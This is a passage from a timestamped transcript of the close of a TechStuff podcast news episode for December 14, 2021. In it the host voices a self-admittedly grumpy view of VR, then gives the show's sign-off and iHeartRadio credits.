VR has had a real go 331 00:20:17,560 --> 00:20:20,560 Speaker 1: of it, because It just seems to me to be 332 00:20:20,640 --> 00:20:23,880 Speaker 1: a way to digitally enhance all the stuff about humans 333 00:20:23,960 --> 00:20:26,920 Speaker 1: and capitalism that I think are kind of gross and awful. 334 00:20:28,080 --> 00:20:30,880 Speaker 1: But hey, I'm well on my way into turning into 335 00:20:30,960 --> 00:20:34,560 Speaker 1: a grumpy old luddite. So don't listen to me. Form 336 00:20:34,600 --> 00:20:38,119 Speaker 1: your own opinions. Look into it and decide what you 337 00:20:38,160 --> 00:20:40,520 Speaker 1: think is good or not good. Don't just take my 338 00:20:40,560 --> 00:20:44,640 Speaker 1: own grouchy approach. Uh. I just I gotta go outside 339 00:20:44,640 --> 00:20:47,560 Speaker 1: and yell at a passing cloud. And that wraps up 340 00:20:47,640 --> 00:20:51,199 Speaker 1: the news for Tuesday, December fourteen, twenty one. If you 341 00:20:51,240 --> 00:20:53,440 Speaker 1: have suggestions for topics I should cover in Tech Stuff 342 00:20:53,440 --> 00:20:55,680 Speaker 1: in the future, please reach out to me. The best 343 00:20:55,720 --> 00:20:58,000 Speaker 1: way to do that is on Twitter. The handle for 344 00:20:58,040 --> 00:21:01,480 Speaker 1: the show is text Stuff h W and I'll talk 345 00:21:01,520 --> 00:21:09,760 Speaker 1: to you again really soon. Text Stuff is an I 346 00:21:09,880 --> 00:21:13,359 Speaker 1: Heart Radio production. For more podcasts from I Heart Radio, 347 00:21:13,720 --> 00:21:16,879 Speaker 1: visit the I heart Radio app, Apple Podcasts, or wherever 348 00:21:16,960 --> 00:21:18,480 Speaker 1: you listen to your favorite shows.